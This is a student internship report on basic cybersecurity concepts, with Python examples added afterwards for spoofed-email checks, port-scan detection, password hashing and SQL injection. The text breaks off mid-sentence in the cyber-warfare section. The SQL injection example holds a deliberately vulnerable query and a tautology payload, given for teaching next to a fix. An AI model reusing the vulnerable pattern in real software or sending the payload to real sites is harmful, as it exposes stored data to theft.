
Palo Alto Networks Certified Cybersecurity Entry-level Technician (PCCET)

A Summer Internship-1 Report Submitted in Partial Fulfillment of the Requirements for the Award of the Degree of

Bachelor of Technology

in

Computer Science and Engineering

by

Name: B.TEJA    Reg No: 20KD1A0516

Department of Computer Science And Engineering

Lendi Institute of Engineering and Technology (A)

(Affiliated to Jawaharlal Nehru Technological University, Kakinada)

Approved by AICTE, Accredited by NBA & NAAC with ‘A’ Grade

Vizianagaram-535005

November 2021-September-2022
CERTIFICATE
CONTENTS
1. Cyber Security 01-08
1.1 Introduction 01
1.1.1 What is Cybersecurity?
1.1.2 Why do we need Cybersecurity?
1.2 Cyber Crime 03
1.2.1 Who are Cybercriminals?
1.2.2 Types of Cybercriminals
1.3 Classification of Cyber Crimes 06
1.3.1 Email Spoofing
1.3.2 Denial of Service or DOS Attack
1.3.3 Malware Attack
1.3.4 Man in the Middle Attack
1.3.5 Phishing Attack
2. Cyber Offense 09-12
2.1 Introduction 09
2.1.1 Categories of Cybercrime
2.2 How Criminals plan attacks 09
2.2.1 Active Attacks Vs Passive Attacks
2.2.2 Scanning and Scrutinizing Information
2.3 Social Engineering 10
2.3.1 Classification of Social Engineering
2.4 What motivates cybercriminals 11
2.4.1 White Hat Hackers Vs Black Hat Hackers
3. Cyber Security Threats 13-24
3.1 Layers of Cyber Security 13
3.2 Types of Cyber Security threats 15
3.3 Common Network vulnerabilities 17
3.4 Cyber warfare 19
3.4.1 Types of Cyber Warfare Attacks
3.4.2 Examples of Cyber Warfare Operations
3.5 Cybercrime mobile and wireless devices 22
3.5.1 Smishing
3.5.2 Wardriving
3.5.3 War chalking
3.5.4 Vishing Attack
3.5.5 WEP Attack
3.5.6 Phishing
4. Cyber Forensics 25-28
4.1 Cybercrime Investigation by CBI 25
4.2 National Cyber Security Policy 26
4.2.1 Need for a cyber security policy
4.3 National Cyber Security Policy Vision 28
5. Conclusion 30
Pg No : 1

1.CYBER SECURITY
1.1 Introduction:
The internet has made the world smaller in many ways, but it has also exposed us to influences that
have never been so varied and so challenging. As fast as security grew, the hacking world grew faster. There
are two ways of looking at the issue of cyber security. One is that the companies that provide cloud
computing do that and only that, so these companies will be extremely well secured with the latest in
cutting-edge encryption technology.

The technique of protecting internet-connected systems such as computers, servers, mobile
devices, electronic systems, networks, and data from malicious attacks is known as cybersecurity. We
can divide cybersecurity into two parts: one is cyber, and the other is security.

Cyber refers to the technology that includes systems, networks, programs and data, while security is
concerned with the protection of systems, networks, applications, and information. In some cases, it is also
called electronic information security or information technology security.

1.1.1 What is Cybersecurity?


It is the protection of internet-connected systems, including hardware, software and data, from
cyberattacks. In a computing context, security comprises cyber security and physical security. Both are used
by enterprises to safeguard against unauthorized access to data centers and other computerized systems.
Security that is designed to maintain the confidentiality, integrity and availability of data is a subset of cyber
security.

Reg No : 20KD1A0516
Pg No : 2

Cybersecurity is the practice of protecting critical systems and sensitive information from digital attacks.
Also known as information technology (IT) security, cybersecurity measures are designed to combat threats
against networked systems and applications, whether those threats originate from inside or outside of an
organization. Security system complexity, created by disparate technologies and a lack of in-house expertise,
can amplify the cost of a breach. But organizations with a comprehensive cybersecurity strategy, governed by
best practices and automated using advanced analytics, artificial intelligence (AI) and machine learning, can
fight cyberthreats more effectively and reduce the lifecycle and impact of breaches when they occur.

1.1.2 Why do we need Cybersecurity?


Cybersecurity is crucial because it safeguards all types of data against theft and loss. Protected health
information (PHI), personally identifiable information (PII), intellectual property, personal information, and
government and business information systems are all included.

Cyber terrorism: the innovative use of information technology by terrorist groups to further their
political agenda. It takes the form of attacks on networks, computer systems and telecommunication
infrastructures.

Cyber warfare: involves nation-states using information technology to penetrate another nation's
networks to cause damage. In the U.S. and many other nations, cyber warfare has been acknowledged as the
fifth domain of warfare.

Cyber warfare attacks are primarily executed by hackers who are well trained in exploiting the intricacies of
computer networks and who operate under the auspices and support of nation-states. Rather than shutting
down a target's key networks, a cyber-warfare attack may intrude into those networks to compromise
valuable data, degrade communications, impair infrastructural services such as transportation and medical
services, or interrupt commerce.

Cyber espionage: the practice of using information technology to obtain secret information without
permission from its owners or holders. It is most often used to gain strategic, economic or military
advantage, and is conducted using cracking techniques and malware.

1.2 Cyber Crime:


Reaching a consensus on a definition of computer crime is difficult. One definition that is advocated
is "a crime conducted in which a computer was directly and significantly instrumental." This definition is not
universally accepted. It does, however, initiate further discussion to narrow the scope of the definition of
"cybercrime"; for example, we can propose the following alternative definitions of computer crime:

1. Any illegal act where a special knowledge of computer technology is essential for its perpetration,
investigation or prosecution.

2. Any traditional crime that has acquired a new dimension or order of magnitude through the aid of a
computer, and abuses that have come into being because of computers.

3. Any financial dishonesty that takes place in a computer environment.

4. Any threats to the computer itself, such as theft of hardware or software, sabotage and demands for
ransom.


Here is yet another definition:

"Cybercrime (computer crime) is any illegal behavior, directed by means of electronic operations,
that targets the security of computer systems and the data processed by them."

Note that in a wider sense, "computer-related crime can be any illegal behavior committed by means
of, or in relation to, a computer system or network". However, this is not cybercrime.

Statute and treaty law both refer to "cybercrime." The term "cybercrime" relates to several other
terms that may sometimes be used interchangeably to describe crimes committed using computers.
Computer related crime, Computer crime, Internet crime, E-crime, High-tech crime, etc. are the other
synonymous terms. Cybercrime specifically can be defined in several ways; a few definitions are:

1. A crime committed using a computer and the Internet to steal a person's identity (identity theft), sell
contraband, stalk victims or disrupt operations with malevolent programs.

2. Crimes completed either on or with a computer.

3. Any illegal activity done through the Internet or on a computer. All such criminal activities are done using
the medium of computers, the internet and cyberspace.

1.2.1 Who are Cybercriminals?


Cybercrime involves such activities as credit card fraud; cyberstalking; defaming another online;
gaining unauthorized access to computer systems; ignoring copyright, software licensing and trademark
protection; overriding encryption to make illegal copies; software piracy; and stealing another's identity
(known as identity theft) to perform criminal acts.

Cybercriminals are individuals or teams of people who use technology to commit malicious activities on
digital systems or networks with the intention of stealing sensitive company information or personal data
and generating profit.

Cybercriminals are known to access the cybercriminal underground markets found in the deep web to trade
malicious goods and services, such as hacking tools and stolen data.

Cybercriminal underground markets are known to specialize in certain products or services.


1.2.2 Types of Cybercriminals


Mostly these are categorized into 3 types.

Type 1: Cybercriminals – hungry for recognition:

1. Hobby hackers
2. IT professionals (social engineering is one of the biggest threats)
3. Politically motivated hackers
4. Terrorist organizations.

Type 2: Cybercriminals – not interested in recognition:

1. Psychological perverts
2. Financially motivated hackers (corporate espionage)
3. State-sponsored hacking (national espionage, sabotage)
4. Organized criminals.

Type 3: Cybercriminals – the insiders:

1. Disgruntled or former employees seeking revenge
2. Competing companies use employees to gain economic advantage through damage and/or theft.
3. Cyber cafes are known to play a role in committing cyber crimes.

Thus, the typical motives behind cybercrime seem to be greed, desire to gain power and/or publicity, desire
for revenge, a sense of adventure, looking for thrill to access forbidden information, destructive mindset and
desire to sell network security services.


1.3 Classifications of Cyber Crimes:


Cybercrime is an unauthorized activity involving a computer, device, or network. The three types are
computer-assisted crimes, crimes where the computer itself is a target, and crimes where the computer is
incidental to the crime rather than directly related to it.

1.3.1 Email Spoofing:


Email spoofing is possible because of the way email systems are designed. Outgoing messages are
assigned a sender address by the client application; outgoing email servers have no way to tell whether the
sender address is legitimate or spoofed.

Recipient servers and anti-malware software can help detect and filter spoofed messages.
Unfortunately, not every email service has such security protocols in place. Still, users can review the email
headers packaged with every message to determine whether the sender address is forged.
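To make the header review described above concrete, here is an added Python example (not part of the original report) that applies the checks a recipient would otherwise do by hand: it compares the domain in the visible From header with the Return-Path and Reply-To domains, and reads the SPF and DKIM verdicts that a receiving server records in the Authentication-Results header. The two messages are constructed samples, and the header layout and indicator names are assumptions made for the example.

```python
import email
from email import policy
from email.utils import parseaddr

# Two constructed sample messages (not real captures). The first claims to come
# from a bank but its envelope sender, Reply-To and SPF/DKIM results disagree
# with the visible From header; the second is internally consistent.
SAMPLE_MESSAGE = """\
Return-Path: <bounce@mail.example-bulk.net>
Authentication-Results: mx.example.org; spf=fail smtp.mailfrom=mail.example-bulk.net; dkim=none
Received: from mail.example-bulk.net (203.0.113.10) by mx.example.org
From: "Accounts Team" <accounts@bank.example.com>
Reply-To: <support@bank-example-verify.net>
To: <user@example.org>
Subject: Urgent: verify your account

Please log in using the link below.
"""

LEGIT_MESSAGE = """\
Return-Path: <newsletter@shop.example.com>
Authentication-Results: mx.example.org; spf=pass smtp.mailfrom=shop.example.com; dkim=pass header.d=shop.example.com
From: "Example Shop" <newsletter@shop.example.com>
To: <user@example.org>
Subject: Your order has shipped

Tracking details are attached.
"""


def domain_of(header_value):
    """Return the lower-cased domain part of an address header, or '' if absent."""
    _, address = parseaddr(str(header_value or ""))
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def parse_auth_results(header_value):
    """Extract spf=/dkim=/dmarc= verdicts from an Authentication-Results header."""
    results = {}
    for clause in str(header_value or "").split(";"):
        clause = clause.strip()
        for method in ("spf", "dkim", "dmarc"):
            if clause.startswith(method + "="):
                # keep only the verdict token, e.g. 'fail' from 'spf=fail smtp.mailfrom=...'
                results[method] = clause[len(method) + 1:].split()[0].lower()
    return results


def check_sender(raw_message):
    """Return the list of spoofing indicators found in a message's headers."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    from_domain = domain_of(msg["From"])
    return_path_domain = domain_of(msg["Return-Path"])
    reply_to_domain = domain_of(msg["Reply-To"])
    auth = parse_auth_results(msg["Authentication-Results"])

    indicators = []
    # The envelope sender (Return-Path) is set by the sending server, not by
    # the client that wrote the From header, so a mismatch is worth a look.
    if return_path_domain and return_path_domain != from_domain:
        indicators.append("return-path-mismatch")
    # A Reply-To pointing elsewhere steers replies away from the claimed sender.
    if reply_to_domain and reply_to_domain != from_domain:
        indicators.append("reply-to-mismatch")
    # SPF/DKIM verdicts are written by the receiving server, which the sender
    # cannot rewrite; a fail or missing result weakens the From header's claim.
    if auth.get("spf") in ("fail", "softfail"):
        indicators.append("spf-" + auth["spf"])
    if auth.get("dkim") in ("none", "fail"):
        indicators.append("dkim-" + auth["dkim"])
    return indicators


if __name__ == "__main__":
    for name, raw in (("suspicious", SAMPLE_MESSAGE), ("legitimate", LEGIT_MESSAGE)):
        print(name, "->", check_sender(raw) or ["no indicators"])
```

The mismatch checks are heuristics, not proof: legitimate bulk senders often use a different Return-Path domain, which is why the SPF/DKIM results, which the recipient's own server adds, carry more weight than any single header the sender controls.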


1.3.2 Denial of Service or DOS Attack:


An attack in which a hacker consumes all of a server's resources, so that nothing is left for legitimate users to access.

1.3.3 Malware Attack:


A malware attack is a common cyber-attack in which malware (malicious software) executes
unauthorized actions on the victim's system. The malicious software (a.k.a. virus) encompasses many
specific types of attack, such as ransomware, spyware, command and control, and more.

1.3.4 Man in the Middle Attack:


A MITM attack is a form of cyber-attack in which a malicious individual inserts himself into a communication
between two parties, manipulates both parties and gains access to the data that the two were trying to
deliver to each other. A man-in-the-middle attack also allows the attacker, without either participant
recognizing it until it is too late, to intercept the transmission of data intended for someone else, or to inject
data that was never supposed to be sent at all. In certain contexts, MITM attacks are also referred to as MIM
attacks.

A Man-in-the-Middle (MITM) attack occurs whenever an attacker puts himself between a client and a webpage.
This form of assault comes in many forms.


For example, to intercept financial login credentials, a fraudulent banking website can be used. Between the
user and the real bank webpage, the fake site lies "in the middle."

There are several reasons and strategies for hackers to use a MITM attack. Usually they try to access anything
of value, such as credit card numbers or user login details. They also spy on private meetings, which may
include corporate secrets or other useful information.

The feature that almost every such attack has in common is that the attacker pretends to be somebody (or
some webpage) you trust.

In the above diagram, the intruder has positioned himself between the client and the server to intercept
their confidential data or to feed them manipulated, incorrect information.

1.3.5 Phishing Attack:


An attack in which a hacker sends a seemingly legitimate-looking email asking users to disclose personal
information. Other types of cyberattacks include cross-site scripting attacks, password attacks,
eavesdropping attacks (which can also be physical), SQL-injection attacks, and birthday attacks based on
algorithm functions.


2.CYBER OFFENSES

2.1 Introduction:
Cyber offences are illegitimate actions carried out in a sophisticated manner, where the computer is
either the tool or the target, or both. Cyber-crime usually includes the following: unauthorized access to
computers, data diddling, and virus/worm attacks.

Cybercrimes can involve criminal activities that are traditional in nature, such as theft, fraud, forgery,
defamation and mischief, all of which are subject to the Indian Penal Code. The abuse of computers has also
given birth to new age crimes that are addressed by the Information Technology Act, 2000.

Section 16 of the MCC contains offenses in the first category, namely, illegal access, illegal
interception, data interference, system interference, and misuse of devices.

2.1.1 Categories of Cybercrime:


There are three major categories of cybercrimes

1.Crimes against People

These crimes include cyber harassment and stalking, distribution of child pornography, credit card fraud,
human trafficking, spoofing, identity theft, and online libel or slander.

2.Crimes against Property

Some online crimes occur against property, such as a computer or server. These crimes include DDOS
attacks, hacking, virus transmission, cyber and typo squatting, computer vandalism, copyright infringement,
and IPR violations.

3.Crimes against Government

When a cybercrime is committed against the government, it is considered an attack on that nation's
sovereignty. Cybercrimes against the government include hacking, accessing confidential information, cyber
warfare, cyber terrorism, and pirated software.

2.2 How Criminals Plan the Attacks:


Criminals use many methods and tools to locate the vulnerabilities of their target. The target can be
an individual and/or an organization. Active attacks are usually used to alter the system, whereas passive
attacks attempt to gain information about the target. Cybercriminals commit cybercrimes using different
tools and techniques, but the basic process of performing the attacks is the same in general.


2.2.1 Active Attacks Vs Passive Attacks:

2.2.2 Scanning and Scrutinizing Information


Scanning is a key step in intelligently examining the information gathered about the target. The objectives
of scanning are as follows:

Port scanning: identify open/closed ports and services.

Network scanning: understand IP addresses and related information about the computer network systems.

Vulnerability scanning: understand the existing weaknesses in the system.

The scrutinizing phase is always called "enumeration" in the hacking world.
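Scanning leaves a distinctive trace on the target's side: a single source touching many distinct ports within a short time. The following added Python example (not code from the report) shows the defender's view of the port scanning described above, flagging such sources in firewall logs with a sliding time window. The log format, the addresses and the 60-second / 8-port threshold are constructed assumptions for the example.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed firewall log lines (not from a real system). One host probes ten
# different ports in four seconds; a second host makes ordinary web connections.
SAMPLE_LOG = """\
2024-03-01T10:00:00 SRC=198.51.100.7 DST=192.0.2.10 DPT=21 ACTION=DROP
2024-03-01T10:00:00 SRC=198.51.100.7 DST=192.0.2.10 DPT=22 ACTION=DROP
2024-03-01T10:00:01 SRC=198.51.100.7 DST=192.0.2.10 DPT=23 ACTION=DROP
2024-03-01T10:00:01 SRC=198.51.100.7 DST=192.0.2.10 DPT=25 ACTION=DROP
2024-03-01T10:00:02 SRC=198.51.100.7 DST=192.0.2.10 DPT=80 ACTION=ACCEPT
2024-03-01T10:00:02 SRC=198.51.100.7 DST=192.0.2.10 DPT=110 ACTION=DROP
2024-03-01T10:00:03 SRC=198.51.100.7 DST=192.0.2.10 DPT=143 ACTION=DROP
2024-03-01T10:00:03 SRC=198.51.100.7 DST=192.0.2.10 DPT=443 ACTION=ACCEPT
2024-03-01T10:00:04 SRC=198.51.100.7 DST=192.0.2.10 DPT=445 ACTION=DROP
2024-03-01T10:00:04 SRC=198.51.100.7 DST=192.0.2.10 DPT=3389 ACTION=DROP
2024-03-01T10:00:05 SRC=203.0.113.5 DST=192.0.2.10 DPT=443 ACTION=ACCEPT
2024-03-01T10:00:09 SRC=203.0.113.5 DST=192.0.2.10 DPT=443 ACTION=ACCEPT
2024-03-01T10:00:15 SRC=203.0.113.5 DST=192.0.2.10 DPT=80 ACTION=ACCEPT
"""

# Assumed line layout: ISO timestamp, then SRC/DST/DPT/ACTION key=value fields.
LINE_RE = re.compile(r"^(\S+) SRC=(\S+) DST=(\S+) DPT=(\d+) ACTION=(\S+)$")


def parse_log(text):
    """Turn log text into (timestamp, src, dst, dport, action) tuples; skip malformed lines."""
    events = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue
        ts, src, dst, dpt, action = match.groups()
        events.append((datetime.fromisoformat(ts), src, dst, int(dpt), action))
    return events


def detect_port_scans(events, window_seconds=60, min_ports=8):
    """Return {src: peak distinct destination ports in any window} for sources
    that reached at least `min_ports` distinct ports within `window_seconds`."""
    by_src = defaultdict(list)
    for ts, src, _dst, dpt, _action in events:
        by_src[src].append((ts, dpt))

    flagged = {}
    for src, items in by_src.items():
        items.sort()                 # by timestamp, so the window can slide
        in_window = Counter()        # port -> hits currently inside the window
        left = 0
        peak = 0
        for ts, dpt in items:
            in_window[dpt] += 1
            # Drop events that fell out of the window behind this one.
            while (ts - items[left][0]).total_seconds() > window_seconds:
                old_port = items[left][1]
                in_window[old_port] -= 1
                if in_window[old_port] == 0:
                    del in_window[old_port]
                left += 1
            peak = max(peak, len(in_window))
        if peak >= min_ports:
            flagged[src] = peak
    return flagged


if __name__ == "__main__":
    for src, ports in detect_port_scans(parse_log(SAMPLE_LOG)).items():
        print("possible port scan from %s: %d distinct ports" % (src, ports))
```

Counting distinct ports rather than raw hits is what separates a scan from a busy but legitimate client, which tends to hit the same one or two ports repeatedly; the threshold is something to tune against your own baseline traffic.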

2.3 Social Engineering:


Social engineering is the tactic of manipulating, influencing, or deceiving a victim in order to gain control
over a computer system, or to steal personal and financial information. It uses psychological manipulation to
trick users into making security mistakes or giving away sensitive information.

Social engineering attacks happen in one or more steps. A perpetrator first investigates the intended victim
to gather necessary background information, such as potential points of entry and weak security protocols,
needed to proceed with the attack. Then, the attacker uses a form of pretexting such as impersonation to gain
the victim’s trust and provide stimuli for subsequent actions that break security practices, such as revealing
sensitive information or granting access to critical resources.


2.3.1 Classification of Social Engineering


Human-Based Social Engineering

Human-based social engineering refers to person-to-person interaction to get the required/desired
information. An example is calling the help desk and trying to find out a password.

1.Impersonating an employee or valid user:

"Impersonation" is perhaps the greatest technique used by social engineers to deceive people. Social
engineers take advantage of the fact that most people are basically helpful, so it seems harmless to tell
someone who appears to be lost where the computer room is located, to let someone into the building who
"forgot" his/her badge, or to assist someone pretending to be an employee or valid user on the system.

2.Posing as an important user:

The attacker pretends to be an important user - for example, a Chief Executive Officer (CEO) or
high- level manager who needs immediate assistance to gain access to a system. The attacker uses
intimidation so that a lower-level employee such as a help-desk worker will help him/her in gaining access
to the system. Most of the low-level employees will not ask any question of someone who appears to be in a
position of authority.

3.Using a third person:

An attacker pretends to have permission from an authorized source to use a system. This trick is useful
when the supposed authorizing person is on vacation.

4.Calling technical support:

Calling the technical support for assistance is a classic social engineering example. Helpdesk and
technical support personnel are trained to help users, which makes them good prey for social engineering
attacks.

2.4 What Motivates Cyber Criminals?


The main motive behind cybercrime is to disrupt regular business activity and critical infrastructure.
Cybercriminals also commonly manipulate stolen data to benefit financially, cause financial loss, damage a
reputation, achieve military objectives, and propagate religious or political beliefs. Some don't even need a
motive and might hack for fun or simply to showcase their skills.

So, who are these cybercriminals? Here’s a breakdown of the most common types:

Gray-Hat Hackers:

They work both with malicious intent and as legitimate security analysts.

Suicide Hackers:

They aim to openly bring down the critical infrastructure for a social cause.


Script Kiddies:

They are unskilled hackers who run scripts and software created by more experienced hackers.

Cyber Terrorists:

They create fear by disrupting large-scale computer networks; motivated by religious or political beliefs.

State-Sponsored Hackers:

They penetrate government networks, gain top-secret information, and damage information systems; paid
for by a hostile government.

2.4.1 White Hat Hackers Vs Black Hat Hackers:


3.CYBER SECURITY THREATS

3.1 Layers of Cyber Security:


Cyber Security is a process that’s designed to protect networks and devices from external threats.
Businesses typically employ Cyber Security professionals to protect their confidential information, maintain
employee productivity, and enhance customer confidence in products and services.

The world of Cyber Security revolves around the industry standard of confidentiality, integrity, and
availability, or CIA. Confidentiality means data can be accessed only by authorized parties; integrity means
information can be added, altered, or removed only by authorized users; and availability means systems,
functions, and data must be available on demand according to agreed-upon parameters.

The main element of Cyber Security is the use of authentication mechanisms. For example, a
username identifies an account that a user wants to access, while a password is a mechanism that proves the
user is who he claims to be. The Seven Layers of cyber security are:


1. Mission-Critical Assets:

This is data that is critical to protect. Whether businesses would like to admit it or not, they face
malicious forces daily.

The question is how leaders are dealing with this type of protection, and what measures they have
put in place to guard against breaches. An example of mission-critical assets in the healthcare industry is
Electronic Medical Record (EMR) software; in the financial sector, it is customers' financial records.

2.Data Security:

Data security means that security controls are put in place to protect both the transfer and the
storage of data. There must be backup measures in place to prevent the loss of data, which also requires the
use of encryption and archiving. Data security is an important focus for all businesses, as a breach of data
can have dire consequences.

3.Endpoint Security:

This layer of security makes sure that the endpoints of user devices are not exploited by breaches.
This includes the protection of mobile devices, desktops, and laptops. Endpoint security systems enable
protection either on a network or in the cloud depending on the needs of a business.

4.Application Security:

This involves the security features that control access to an application and that application’s access
to your assets. It also includes the internal security of the app itself. Most of the time, applications are
designed with security measures that continue to provide protection when the app is in use.

5.Network Security:

This is where security controls are put in place to protect the business’s network. The goal is to
prevent unauthorized access to the network. It is crucial to regularly update all systems on the business
network with the necessary security patches, including encryption. It’s always best to disable unused
interfaces to further guard against any threats.

6.Perimeter Security:

This security layer ensures that both the physical and digital security methods protect a business. It
includes things like firewalls that protect the business network against external forces.

7.The Human Layer:

Despite being known as the weakest link in the security chain, the human layer is a very necessary
layer. It incorporates management controls and phishing simulations as an example.

These human management controls aim to protect what is most critical to a business in terms of security.
This includes the very real threat that humans, cyber attackers, and malicious users pose to a business.


3.2 Types of Cyber Security Threats:


As the recent epidemic of data breaches illustrates, no system is immune to attacks. Any company that
manages, transmits, stores, or otherwise handles data must institute and enforce mechanisms to monitor its
cyber environment, identify vulnerabilities, and close security holes as quickly as possible. Before
identifying specific dangers to modern data systems, it is crucial to understand the distinction between cyber
threats and vulnerabilities.

Cyber threats are security incidents or circumstances that can have a negative outcome for your network or
other data management systems.

Examples of common types of security threats include phishing attacks that result in installing malware that
infects your data, failure of a staff member to follow data protection protocols that causes a data breach, or
even natural forces that take down your company's data headquarters, disrupting access.

Vulnerabilities are the gaps or weaknesses in a system that make threats possible and tempt threat actors to
exploit them.

Types of vulnerabilities in network security include but are not limited to SQL injections, server
misconfigurations, cross-site scripting, and transmitting sensitive data in a non-encrypted plain text format.

When the threat probability is multiplied by the potential loss that may result, cyber security experts refer to
this as a risk.

Just as some germs and diseases can attack the human body, numerous threats can affect hardware, software,
and the information you store. Some of the major ones include the following:

Viruses are designed so that they can be easily transmitted from one computer or system to another. Often
sent as email attachments, viruses corrupt and co-opt data, interfere with your security settings, generate
spam, and may even delete content.

Computer worms are similar; they spread from one computer to the next by sending themselves to all of
the user’s contacts and subsequently to all contacts’ contacts.


Trojans are malicious pieces of software that insert themselves into a legitimate program. Often, people
voluntarily let trojans into their systems via email messages from a person or an advertiser they trust. As
soon as the accompanying attachment is opened, your system becomes vulnerable to the malware within.

Bogus security software tricks users into believing that their system has been infected with a virus. The
"security software" that the threat actor then provides to fix the problem is what actually causes it.

The adware tracks your browsing habits and causes advertisements to pop up. Although this is common and
often something you may even agree to, adware is sometimes imposed upon you without your consent.

Spyware is an intrusion that may steal sensitive data such as passwords and credit card numbers from your
internal systems.

A denial of service (DOS) attack occurs when hackers deluge a website with traffic, making it impossible
to access its content. A distributed denial of service (DDOS) attack is more forceful and aggressive since it
is initiated from several servers simultaneously. As a result, a DDOS attack makes it harder to mount
defenses against it.

Phishing attacks are social engineering infiltrations whose goal is to obtain sensitive data, such as passwords
and credit card numbers, by deception. Via emails or links purporting to come from trusted companies and
financial institutions, the hacker causes malware to be downloaded and installed.

SQL injections are network threats that involve using malicious code to infiltrate cyber vulnerabilities in
data systems. As a result, data can be stolen, changed, or destroyed.

Man-in-the-middle attacks involve a third-party intercepting and exploiting communications between two
entities that should remain private. Eavesdropping occurs, but information can be changed or misrepresented
by the intruder, causing inaccuracy and even security breaches.

Rootkit tools gain remote access to systems without permission and can lead to the installation of malware
and the stealing of passwords and other data.

Ransomware is a type of malware that involves an attacker locking the victim's computer system files,
typically through encryption, and demanding a payment to decrypt and unlock them.

3.3 Common Network Vulnerabilities:


Even seemingly minor flaws or oversights in the design or implementation of your network systems can lead
to disaster. Among the most common network vulnerabilities are gaps in application security: when
applications are not kept up to date, tested, and patched, the doors are open to code injection, cross-site
scripting, insecure direct object references, and much more.

Cyber security professionals should have an in-depth understanding of the following types of cyber security
threats.

Malware Attack:

Malware is malicious software such as spyware, ransomware, viruses and worms. Malware is activated
when a user clicks on a malicious link or attachment, which leads to installing dangerous software. Cisco
reports that malware, once activated, can:

Block access to key network components (ransomware)

Install additional harmful software

Covertly obtain information by transmitting data from the hard drive (spyware)

Disrupt individual parts, making the system inoperable


Emotet:

The Cybersecurity and Infrastructure Security Agency (CISA) describes Emotet as “an advanced, modular
banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Emotet
continues to be among the most costly and destructive malware.”

Password Attacks:

With the right password, a cyber attacker has access to a wealth of information. Social engineering is a type
of password attack that Data Insider defines as “a strategy cyber attackers use that relies heavily on human
interaction and often involves tricking people into breaking standard security practices.” Other types of
password attacks include accessing a password database or outright guessing.
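Both the authentication discussion in 3.1 (the username identifies the account, the password proves the user is who he claims to be) and the password-database attacks mentioned here hinge on how passwords are stored and checked. The added Python example below (not from the report) hashes each password with a random salt using PBKDF2-HMAC-SHA256 and verifies with a constant-time comparison, so a copied database does not hand over usable passwords and two accounts with the same password get different records. The iteration count, usernames and passwords are assumptions constructed for the example.

```python
import hashlib
import hmac
import os

# Work factor for PBKDF2-HMAC-SHA256; an assumed value for this example, tuned
# in practice to how much time the login path can afford per attempt.
ITERATIONS = 200_000


def hash_password(password, salt=None):
    """Return a storable record 'pbkdf2_sha256$iterations$salt_hex$digest_hex'.
    A fresh random salt per password means equal passwords give different records,
    and a stolen table cannot be attacked with one precomputed list."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_password(record, candidate):
    """Recompute the digest with the stored salt and compare in constant time,
    so the comparison itself leaks nothing about how many bytes matched."""
    algorithm, iterations, salt_hex, digest_hex = record.split("$")
    if algorithm != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


# Record for a non-existent account, so an unknown username costs the same
# work as a known one and response time does not reveal which accounts exist.
DUMMY_RECORD = hash_password("placeholder-password-never-accepted")


def authenticate(user_db, username, password):
    """Username selects the account; the password is the proof of the claim.
    `user_db` maps username -> stored record, never the password itself."""
    record = user_db.get(username)
    if record is None:
        verify_password(DUMMY_RECORD, password)
        return False
    return verify_password(record, password)


if __name__ == "__main__":
    # Constructed user database for the demonstration.
    users = {"alice": hash_password("correct horse battery staple")}
    print(authenticate(users, "alice", "correct horse battery staple"))  # True
    print(authenticate(users, "alice", "Tr0ub4dor&3"))                   # False
    print(authenticate(users, "mallory", "anything"))                    # False
```

Guessing attacks still work against weak passwords even with this scheme; what the salt and iteration count buy the defender is that each guess must be computed separately per account and costs real time.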


SQL Injection:

A Structured Query Language (SQL) injection is a type of cyber-attack that results from inserting malicious
code into a server that uses SQL. When infected, the server releases information. Submitting the malicious
code can be as simple as entering it into a vulnerable website search box.
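The weakness described here, and in the SQL injection item under 3.2, comes from building the query text out of whatever the user typed. The added Python example below (not code from the report) puts a vulnerable search function beside its parameterized fix on an in-memory SQLite table, so the difference can be observed directly; the table, the users and the search terms are constructed for the example.

```python
import sqlite3


def make_db():
    """Build a small in-memory table of constructed users for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (username, email) VALUES (?, ?)",
        [("alice", "alice@example.org"), ("bob", "bob@example.org"), ("carol", "carol@example.org")],
    )
    conn.commit()
    return conn


def search_users_vulnerable(conn, term):
    """Vulnerable: the search term is spliced into the SQL text, so whatever
    the user typed is parsed by the database as part of the query."""
    query = "SELECT username FROM users WHERE username = '%s'" % term
    return [row[0] for row in conn.execute(query)]


def search_users_safe(conn, term):
    """Hardened: a bound parameter keeps the term as data. The database never
    interprets it as SQL, whatever quote characters it contains."""
    query = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(query, (term,))]


if __name__ == "__main__":
    db = make_db()
    # A quoting-based search term that turns the spliced query into a tautology.
    term = "' OR '1'='1"
    print("vulnerable:", search_users_vulnerable(db, term))  # every row leaks
    print("safe:      ", search_users_safe(db, term))        # no such username
```

The fix is not escaping or filtering characters but the parameter binding itself: the query structure is fixed before the database ever sees the input, which is why the same approach holds for every SQL driver, not just SQLite.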

3.4 Cyber Warfare

Cyber warfare is usually defined as a cyber-attack or series of attacks that target a country. It has the
potential to wreak havoc on government and civilian infrastructure and disrupt critical systems, resulting in
damage to the state and even loss of life.

There is, however, a debate among cyber security experts as to what kind of activity constitutes cyber
warfare. The US Department of Defense (DoD) recognizes the threat to national security posed by the
malicious use of the Internet but doesn’t provide a clearer definition of cyber warfare. Some consider cyber
warfare to be a cyber-attack that can result in death.

Cyber warfare typically involves a nation-state perpetrating cyber-attacks on another, but in some cases, the
attacks are carried out by terrorist organizations or non-state actors seeking to further the goal of a hostile
nation. There are several examples of alleged cyber warfare in recent history, but there is no universal,
formal, definition for how a cyber-attack may constitute an act of war.

3.4.1 Types of Cyber Warfare Attacks


Here are some of the main types of cyber warfare attacks:


1. Espionage

Refers to monitoring other countries to steal secrets. In cyber warfare, this can involve using botnets or spear
phishing attacks to compromise sensitive computer systems before exfiltrating sensitive information.

2.Sabotage

Government organizations must determine sensitive information and the risks if it is compromised. Hostile
governments or terrorists may steal information, destroy it, or leverage insider threats such as dissatisfied or
careless employees, or government employees with affiliation to the attacking country.

3. Denial-of-service (DoS) Attacks

DoS attacks prevent legitimate users from reaching a website or service by flooding it with bogus requests
that it must still process; in practice the flood usually comes from many compromised machines at once
(a distributed DoS, or DDoS). In cyber warfare this can disrupt critical operations and systems and block
